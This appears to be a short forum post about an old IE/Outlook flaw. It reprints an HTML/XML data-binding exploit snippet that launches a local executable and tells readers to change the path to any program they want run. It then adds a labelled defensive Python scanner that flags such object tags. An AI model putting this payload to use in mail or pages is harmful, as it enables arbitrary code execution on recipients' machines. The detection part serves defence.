The Register has just posted that IE/Outlook can run arbitrary commands with a simple bit of HTML. Read the rest here: http://www.theregister.co.uk/content/4/24274.html

The article also has a simple fix for this problem.

Here's the simple script:

<span datasrc="#oExec" datafld="exploit" dataformatas="html"></span>
<xml id="oExec">
  <security>
    <exploit>
      <![CDATA[
      <object id="oFile" classid="clsid:11111111-1111-1111-1111-111111111111" codebase="c:/windows/system32/calc.exe"></object>
      ]]>
    </exploit>
  </security>
</xml>

Change c:/windows/system32/calc.exe to the appropriate directory and filename you want to run. I've tested this myself, and it's REALLY scary.
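
A defensive check for the pattern in the script above, as an added example that is not part of the original post or the Register article: it scans HTML (a mail body, for instance) for object tags whose codebase is a local path, and records whether the page also binds data with dataformatas="html". Treating drive-letter, UNC and file: values as suspicious is an assumption made here, and the function and sample names are hypothetical.

```python
import re

# Any <object ...> start tag, including ones inside a CDATA section of an
# XML data island, which an HTML parser may not report as elements.
OBJECT_TAG = re.compile(r"<object\b([^>]*)>", re.I)
ATTR = re.compile(r"""([\w:-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""")
# Assumption: a codebase that is a drive-letter path, UNC path or file: URL
# is suspicious, because a legitimate codebase names a download location.
LOCAL_PATH = re.compile(r"^(?:[a-z]:[\\/]|\\\\|file:)", re.I)
# Data binding that renders bound XML text as HTML, as in the post's snippet.
HTML_BINDING = re.compile(r"""dataformatas\s*=\s*["']?html""", re.I)


def parse_attrs(raw):
    """Return a dict of lower-cased attribute names to values."""
    attrs = {}
    for m in ATTR.finditer(raw):
        value = next(g for g in m.groups()[1:] if g is not None)
        attrs[m.group(1).lower()] = value
    return attrs


def find_local_codebase_objects(html):
    """List <object> tags whose codebase attribute is a local path."""
    bound = bool(HTML_BINDING.search(html))
    findings = []
    for m in OBJECT_TAG.finditer(html):
        attrs = parse_attrs(m.group(1))
        codebase = attrs.get("codebase", "").strip()
        if LOCAL_PATH.match(codebase):
            findings.append({
                "classid": attrs.get("classid", ""),
                "codebase": codebase,
                "html_data_binding": bound,
                "offset": m.start(),
            })
    return findings


# The snippet from the post, and a constructed benign page for contrast.
POST_SAMPLE = """<span datasrc="#oExec" datafld="exploit" dataformatas="html"></span>
<xml id="oExec"><security><exploit><![CDATA[
<object id="oFile" classid="clsid:11111111-1111-1111-1111-111111111111" codebase="c:/windows/system32/calc.exe"></object>
]]></exploit></security></xml>"""
BENIGN_SAMPLE = '<object classid="clsid:00000000-0000-0000-0000-000000000000" codebase="https://example.com/control.cab"></object>'

if __name__ == "__main__":
    for sample in (POST_SAMPLE, BENIGN_SAMPLE):
        print(find_local_codebase_objects(sample))
```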